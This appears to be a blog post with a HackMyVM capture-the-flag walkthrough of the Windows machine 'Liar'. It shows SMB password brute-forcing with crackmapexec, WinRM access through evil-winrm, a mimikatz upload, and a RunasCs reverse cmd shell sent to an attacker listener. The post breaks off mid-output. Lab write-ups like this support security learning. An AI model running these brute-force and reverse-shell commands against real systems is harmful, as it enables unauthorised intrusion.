{"id":558,"date":"2024-04-14T20:22:58","date_gmt":"2024-04-14T12:22:58","guid":{"rendered":"http:\/\/162.14.82.114\/?p=558"},"modified":"2024-04-14T20:22:58","modified_gmt":"2024-04-14T12:22:58","slug":"hmv-_-liar","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/558\/04\/14\/2024\/","title":{"rendered":"hmv[-_-]Liar"},"content":{"rendered":"<h1>Liar<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142022033.png\" alt=\"image-20240414183632268\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142022034.png\" alt=\"image-20240414183729215\" 
\/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.6 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.6:80\nOpen 172.20.10.6:135\nOpen 172.20.10.6:139\nOpen 172.20.10.6:445\nOpen 172.20.10.6:5985\nOpen 172.20.10.6:47001\nOpen 172.20.10.6:49664\nOpen 172.20.10.6:49665\nOpen 172.20.10.6:49666\nOpen 172.20.10.6:49667\nOpen 172.20.10.6:49668\nOpen 172.20.10.6:49669\n\nPORT      STATE SERVICE       REASON  VERSION\n80\/tcp    open  http          syn-ack Microsoft IIS httpd 10.0\n|_http-server-header: Microsoft-IIS\/10.0\n|_http-title: Site doesn&#039;t have a title (text\/html).\n| http-methods: \n|   Supported Methods: OPTIONS TRACE GET HEAD POST\n|_  Potentially risky methods: TRACE\n135\/tcp   open  msrpc         syn-ack Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds? syn-ack\n5985\/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n47001\/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n49664\/tcp open  msrpc         syn-ack Microsoft Windows RPC\n49665\/tcp open  msrpc         syn-ack Microsoft Windows RPC\n49666\/tcp open  msrpc         syn-ack Microsoft Windows RPC\n49667\/tcp open  msrpc         syn-ack Microsoft Windows RPC\n49668\/tcp open  msrpc         syn-ack Microsoft Windows RPC\n49669\/tcp open  msrpc         syn-ack Microsoft Windows RPC\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 0s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 14318\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 37030\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 33452\/udp): CLEAN (Timeout)\n|   
Check 4 (port 54648\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: WIN-IURF14RBVGV, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:69:8c:98 (Oracle VirtualBox virtual NIC)\n| Names:\n|   WIN-IURF14RBVGV&lt;20&gt;  Flags: &lt;unique&gt;&lt;active&gt;\n|   WIN-IURF14RBVGV&lt;00&gt;  Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n| Statistics:\n|   08:00:27:69:8c:98:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2024-04-14T10:40:19\n|_  start_date: N\/A<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.6 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<p>The scan found nothing, so I did not push it further.<\/p>\n<h3>Vulnerability Scanning<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.6<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.6\n+ Target Hostname:    172.20.10.6\n+ Target Port:        80\n+ Start Time:         2024-04-14 06:41:38 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Microsoft-IIS\/10.0\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. 
See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .\n+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .\n+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time:           2024-04-14 06:42:02 (GMT-4) (24 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<pre><code class=\"language-text\">Hey bro, You asked for an easy Windows VM, enjoy it. - nica<\/code><\/pre>\n<h3>Sensitive Ports<\/h3>\n<h4>SMB<\/h4>\n<p>Brute-force the SMB port:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Liar]\n\u2514\u2500$ crackmapexec smb 172.20.10.6 -u nica -p \/usr\/share\/wordlists\/rockyou.txt\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [*] Windows 10.0 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:123456 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:12345 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:123456789 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:password STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:iloveyou STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:princess STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:1234567 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    
WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:rockyou STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:12345678 STATUS_LOGON_FAILURE \n.........................\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:crazy STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:valerie STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:spencer STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\nica:scarface STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\\nica:hardcore<\/code><\/pre>\n<p>Let's see what is there:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Liar]\n\u2514\u2500$ smbmap -u nica -p hardcore -H 172.20.10.6\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  
\\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 172.20.10.6:445 Name: 172.20.10.6               Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Admin remota\n        C$                                                      NO ACCESS       Recurso predeterminado\n        IPC$                                                    READ ONLY       IPC remota<\/code><\/pre>\n<p>Try to read them:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Liar]\n\u2514\u2500$ smbclient -L \\\\\\\\172.20.10.6\\\\ -U nica \nPassword for [WORKGROUP\\nica]:\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Admin remota\n        C$              Disk      Recurso predeterminado\n        IPC$            IPC       IPC remota\nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 172.20.10.6 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available<\/code><\/pre>\n<p>That failed....<\/p>\n<h4>5985<\/h4>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/5985-5986-pentesting-winrm\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/5985-5986-pentesting-winrm<\/a><\/p>\n<p><img 
src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142022035.png\" alt=\"image-20240414190422227\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142022036.png\" alt=\"image-20240414190527118\" \/><\/p>\n<p>This shows that the port allows remote connections, so look up the relevant information:<\/p>\n<p><img 
src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142022037.png\" alt=\"image-20240414190652720\" \/><\/p>\n<p>Try it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# gem install evil-winrm\n^CERROR:  Interrupted\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# evil-winrm -h\nEvil-WinRM shell v3.5\nUsage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]\n    -S, --ssl                        Enable ssl\n    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate\n    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate\n    -r, --realm DOMAIN               Kerberos auth, it has to be set also in \/etc\/krb5.conf file using this format -&gt; CONTOSO.COM = { kdc = fooserver.contoso.com }\n    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path\n        --spn SPN_PREFIX             SPN prefix for Kerberos auth (default HTTP)\n    -e, --executables EXES_PATH      C# executables local path\n    -i, --ip IP                      Remote host IP or hostname. 
FQDN for Kerberos auth (required)\n    -U, --url URL                    Remote url endpoint (default \/wsman)\n    -u, --user USER                  Username (required if not using kerberos)\n    -p, --password PASS              Password\n    -H, --hash HASH                  NTHash\n    -P, --port PORT                  Remote host port (default 5985)\n    -V, --version                    Show version\n    -n, --no-colors                  Disable colors\n    -N, --no-rpath-completion        Disable remote path completion\n    -l, --log                        Log the WinRM session\n    -h, --help                       Display this help message\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# evil-winrm -u nica -p &#039;hardcore&#039;  -i 172.20.10.6\nEvil-WinRM shell v3.5\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\nica\\Documents&gt; whoami\nwin-iurf14rbvgv\\nica\n\n*Evil-WinRM* PS C:\\Users\\nica\\Documents&gt; ipconfig\nConfiguraci\u00a2n IP de Windows\n\nAdaptador de Ethernet Ethernet:\n\n   Sufijo DNS espec\u00a1fico para la conexi\u00a2n. . :\n   V\u00a1nculo: direcci\u00a2n IPv6 local. . . : fe80::c12a:b98d:e0bd:5030%5\n   Direcci\u00a2n IPv4. . . . . . . . . . . . . . : 172.20.10.6\n   M scara de subred . . . . . . . . . . . . : 255.255.255.240\n   Puerta de enlace predeterminada . . . . . 
: 172.20.10.1<\/code><\/pre>\n<h2>Privilege Escalation<\/h2>\n<p>Try gathering information:<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nica\\Documents&gt; cd ..\/\n*Evil-WinRM* PS C:\\Users\\nica&gt; dir\n\n    Directorio: C:\\Users\\nica\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-r---        9\/15\/2018   9:12 AM                Desktop\nd-r---        9\/26\/2023   6:44 PM                Documents\nd-r---        9\/15\/2018   9:12 AM                Downloads\nd-r---        9\/15\/2018   9:12 AM                Favorites\nd-r---        9\/15\/2018   9:12 AM                Links\nd-r---        9\/15\/2018   9:12 AM                Music\nd-r---        9\/15\/2018   9:12 AM                Pictures\nd-----        9\/15\/2018   9:12 AM                Saved Games\nd-r---        9\/15\/2018   9:12 AM                Videos\n-a----        9\/26\/2023   6:44 PM             10 user.txt\n\n*Evil-WinRM* PS C:\\Users\\nica&gt; type user.txt\nHMVWINGIFT\n*Evil-WinRM* PS C:\\Users\\nica&gt; net user\n\nCuentas de usuario de \\\\\n\n-------------------------------------------------------------------------------\nAdministrador            akanksha                 DefaultAccount\nInvitado                 nica                     WDAGUtilityAccount\nEl comando se ha completado con uno o m s errores.\n\n*Evil-WinRM* PS C:\\Users\\nica&gt; systeminfo\nsysteminfo.exe : Error: Acceso denegado\n    + CategoryInfo          : NotSpecified: (Error: Acceso denegado:String) [], RemoteException\n    + FullyQualifiedErrorId : NativeCommandError\n\n*Evil-WinRM* PS C:\\Users\\nica&gt; whoami \/all\n\nINFORMACI\u00e0N DE USUARIO\n----------------------\n\nNombre de usuario    SID\n==================== ==============================================\nwin-iurf14rbvgv\\nica S-1-5-21-2519875556-2276787807-2868128514-1000\n\nINFORMACI\u00e0N DE GRUPO\n--------------------\n\nNombre de grupo    
                          Tipo           SID          Atributos\n============================================ ============== ============ ========================================================================\nTodos                                        Grupo conocido S-1-1-0      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nBUILTIN\\Usuarios                             Alias          S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nBUILTIN\\Usuarios de administraci\u00a2n remota    Alias          S-1-5-32-580 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\NETWORK                         Grupo conocido S-1-5-2      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Usuarios autentificados         Grupo conocido S-1-5-11     Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Esta compa\u00a4\u00a1a                   Grupo conocido S-1-5-15     Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Cuenta local                    Grupo conocido S-1-5-113    Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Autenticaci\u00a2n NTLM              Grupo conocido S-1-5-64-10  Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nEtiqueta obligatoria\\Nivel obligatorio medio Etiqueta       S-1-16-8192\n\nINFORMACI\u00e0N DE PRIVILEGIOS\n--------------------------\n\nNombre de privilegio          Descripci\u00a2n                                  Estado\n============================= ============================================ ==========\nSeChangeNotifyPrivilege       Omitir comprobaci\u00a2n de recorrido             Habilitada\nSeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso 
Habilitada<\/code><\/pre>\n<h3>Finding Vulnerabilities<\/h3>\n<p>Look up whether there are any related vulnerabilities, then try brute-forcing the <code>Administrator<\/code> user locally:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142022038.png\" alt=\"image-20240414192148841\" \/><\/p>\n<p>But I was completely confused by what I saw....<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# crackmapexec smb 172.20.10.6 -u akanksha -p \/usr\/share\/wordlists\/rockyou.txt\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [*] Windows 10.0 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:123456 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:12345 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:123456789 STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:password STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] 
WIN-IURF14RBVGV\\akanksha:iloveyou STATUS_LOGON_FAILURE \n...........\nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:german STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:snowman STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:romero STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:madeline STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:dulce STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [-] WIN-IURF14RBVGV\\akanksha:turkey STATUS_LOGON_FAILURE \nSMB         172.20.10.6     445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\\akanksha:sweetgirl<\/code><\/pre>\n<p>Got the username and password:<\/p>\n<pre><code class=\"language-apl\">akanksha\nsweetgirl<\/code><\/pre>\n<p>Switch to that user:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142022039.png\" alt=\"image-20240414192513631\" 
\/><\/p>\n<p>Uh....<\/p>\n<h3>Uploading mimikatz<\/h3>\n<p>I really do not know many techniques here, so try uploading it to see whether it helps:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# cd \/usr\/share\/windows-resources\/mimikatz\/x64\n\n\u250c\u2500\u2500(root\u327fkali)-[\/usr\/share\/windows-resources\/mimikatz\/x64]\n\u2514\u2500# ls             \nmimidrv.sys  mimikatz.exe  mimilib.dll  mimispool.dll\n\n\u250c\u2500\u2500(root\u327fkali)-[\/usr\/share\/windows-resources\/mimikatz\/x64]\n\u2514\u2500# evil-winrm -u nica -p &#039;hardcore&#039;  -i 172.20.10.6\n\nEvil-WinRM shell v3.5\n\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\nica\\Documents&gt; cd ..\n*Evil-WinRM* PS C:\\Users\\nica&gt; upload mimikatz.exe\n\nInfo: Uploading \/usr\/share\/windows-resources\/mimikatz\/x64\/mimikatz.exe to C:\\Users\\nica\\mimikatz.exe\n\nData: 1807016 bytes of 1807016 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nica&gt; ls\nc \n\n    Directorio: C:\\Users\\nica\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-r---        9\/15\/2018   9:12 AM                Desktop\nd-r---        4\/14\/2024   1:27 PM                Documents\nd-r---        9\/15\/2018   9:12 AM                Downloads\nd-r---        9\/15\/2018   9:12 AM                Favorites\nd-r---        9\/15\/2018   9:12 AM                Links\nd-r---        9\/15\/2018   9:12 AM                Music\nd-r---        9\/15\/2018   9:12 AM                Pictures\nd-----        9\/15\/2018   9:12 AM       
         Saved Games\nd-r---        9\/15\/2018   9:12 AM                Videos\n-a----        4\/14\/2024   1:32 PM        1335080 mimikatz.exe\n-a----        9\/26\/2023   6:44 PM             10 user.txt\n\n*Evil-WinRM* PS C:\\Users\\nica&gt; mimikatz.exe\nThe term &#039;mimikatz.exe&#039; is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.\nAt line:1 char:1\n+ mimikatz.exe\n+ ~~~~~~~~~~~~\n    + CategoryInfo          : ObjectNotFound: (mimikatz.exe:String) [], CommandNotFoundException\n    + FullyQualifiedErrorId : CommandNotFoundException<\/code><\/pre>\n<p>Dead on arrival....<\/p>\n<h3>Exploitation<\/h3>\n<p>Search for the error from above, where that user could not log in because it was not authorized:<\/p>\n<pre><code class=\"language-bash\">Error: An error of type WinRM::WinRMAuthorizationError happened, message is 
WinRM::WinRMAuthorizationError<\/code><\/pre>\n<p>I found nothing exploitable there. Reading other people's writeups showed that the tool <code>https:\/\/github.com\/antonioCoco\/RunasCs<\/code> is needed to get around the credential mismatch:<\/p>\n<blockquote>\n<p><em>RunasCs<\/em> is a utility for running specific processes with permissions different from those of the user's current logon, using explicit credentials. The tool is an improved, open version of the Windows built-in <em>runas.exe<\/em> that addresses some limitations:<\/p>\n<ul>\n<li>Allows explicit credentials<\/li>\n<li>Works both when spawned from an interactive process and from a service process<\/li>\n<li>Properly manages the <em>DACL<\/em> of the <em>Window Station<\/em> and <em>Desktop<\/em> for the creation of the new process<\/li>\n<li>Uses more reliable process-creation functions such as <code>CreateProcessAsUser()<\/code> and <code>CreateProcessWithTokenW()<\/code> if the calling process holds the required privileges (automatic detection)<\/li>\n<li>Allows specifying the logon type, e.g. 8-NetworkCleartext logon (no <em>UAC<\/em> limitations)<\/li>\n<li>Allows bypassing UAC when an administrator password is known (flag --bypass-uac)<\/li>\n<li>Allows creating a process whose main thread impersonates the requested user (flag 
--remote-impersonation)<\/li>\n<li>Allows redirecting <em>stdin<\/em>, <em>stdout<\/em> and <em>stderr<\/em> to a remote host<\/li>\n<li>It is open source :)<\/li>\n<\/ul>\n<\/blockquote>\n<p>Try using it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# ls             \nRunasCs.zip\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# unzip RunasCs.zip      \nArchive:  RunasCs.zip\n  inflating: RunasCs.exe             \n  inflating: RunasCs_net2.exe        \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# ls\nRunasCs.exe  RunasCs_net2.exe  RunasCs.zip\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# evil-winrm -u nica -p &#039;hardcore&#039;  -i 172.20.10.6\n\nEvil-WinRM shell v3.5\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\nica\\Documents&gt; cd ..\n*Evil-WinRM* PS C:\\Users\\nica&gt; ls\n\n    Directorio: C:\\Users\\nica\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-r---        9\/15\/2018   9:12 AM                Desktop\nd-r---        4\/14\/2024   1:27 PM                Documents\nd-r---        9\/15\/2018   9:12 AM                Downloads\nd-r---        9\/15\/2018   9:12 AM                Favorites\nd-r---        9\/15\/2018   9:12 AM                Links\nd-r---        9\/15\/2018   9:12 AM                Music\nd-r---        9\/15\/2018   9:12 AM                Pictures\nd-----        9\/15\/2018   9:12 AM                Saved Games\nd-r---        9\/15\/2018   9:12 AM        
        Videos\n-a----        4\/14\/2024   1:32 PM        1335080 mimikatz.exe\n-a----        9\/26\/2023   6:44 PM             10 user.txt\n\n*Evil-WinRM* PS C:\\Users\\nica&gt; upload RunasCs.exe\n\nInfo: Uploading \/home\/kali\/temp\/Liar\/RunasCs.exe to C:\\Users\\nica\\RunasCs.exe\n\nData: 68948 bytes of 68948 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nica&gt; .\\RunasCs.exe akanksha sweetgirl cmd.exe -r 172.20.10.8:3456\n*Evil-WinRM* PS C:\\Users\\nica&gt; ls\n    Directorio: C:\\Users\\nica\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-r---        9\/15\/2018   9:12 AM                Desktop\nd-r---        4\/14\/2024   1:27 PM                Documents\nd-r---        9\/15\/2018   9:12 AM                Downloads\nd-r---        9\/15\/2018   9:12 AM                Favorites\nd-r---        9\/15\/2018   9:12 AM                Links\nd-r---        9\/15\/2018   9:12 AM                Music\nd-r---        9\/15\/2018   9:12 AM                Pictures\nd-----        9\/15\/2018   9:12 AM                Saved Games\nd-r---        9\/15\/2018   9:12 AM                Videos\n-a----        4\/14\/2024   1:32 PM        1335080 mimikatz.exe\n-a----        9\/26\/2023   6:44 PM             10 user.txt<\/code><\/pre>\n<p>Hmm, why does it not work? It works for everyone else. I restarted the target machine and tried again, but the shell still did not connect back. Strange. Is the file getting deleted as well?<\/p>\n<p>Maybe try an earlier version? I tried version <code>1.0<\/code>; in testing it did not work, so I switched to version <code>1.4<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# evil-winrm -u nica -p &#039;hardcore&#039;  -i 
172.20.10.6\n\nEvil-WinRM shell v3.5\n\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\nica\\Documents&gt; cd ..\n*Evil-WinRM* PS C:\\Users\\nica&gt; upload runascs14.exe\n\nInfo: Uploading \/home\/kali\/temp\/Liar\/runascs14.exe to C:\\Users\\nica\\runascs14.exe\n\nData: 65536 bytes of 65536 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nica&gt; .\\runascs14.exe akanksha sweetgirl cmd.exe -r 172.20.10.8:1234\n[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...\n[+] Running in session 0 with process function CreateProcessWithLogonW()\n[+] Using Station\\Desktop: Service-0x0-2abf34$\\Default\n[+] Async process &#039;cmd.exe&#039; with pid 2936 created and left in background.<\/code><\/pre>\n<p>Success, got a shell!!!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Liar]\n\u2514\u2500# nc -lvnp 1234          \nlistening on [any] 1234 ...\nconnect to [172.20.10.8] from (UNKNOWN) [172.20.10.6] 49687\nMicrosoft Windows [Versi\ufffdn 10.0.17763.107]\n(c) 2018 Microsoft Corporation. 
Todos los derechos reservados.\n\nC:\\Windows\\system32&gt;whoami \/all\nwhoami \/all\n\nINFORMACI\ufffdN DE USUARIO\n----------------------\n\nNombre de usuario        SID                                           \n======================== ==============================================\nwin-iurf14rbvgv\\akanksha S-1-5-21-2519875556-2276787807-2868128514-1001\n\nINFORMACI\ufffdN DE GRUPO\n--------------------\n\nNombre de grupo                              Tipo           SID                                            Atributos                                                               \n============================================ ============== ============================================== ========================================================================\nTodos                                        Grupo conocido S-1-1-0                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo 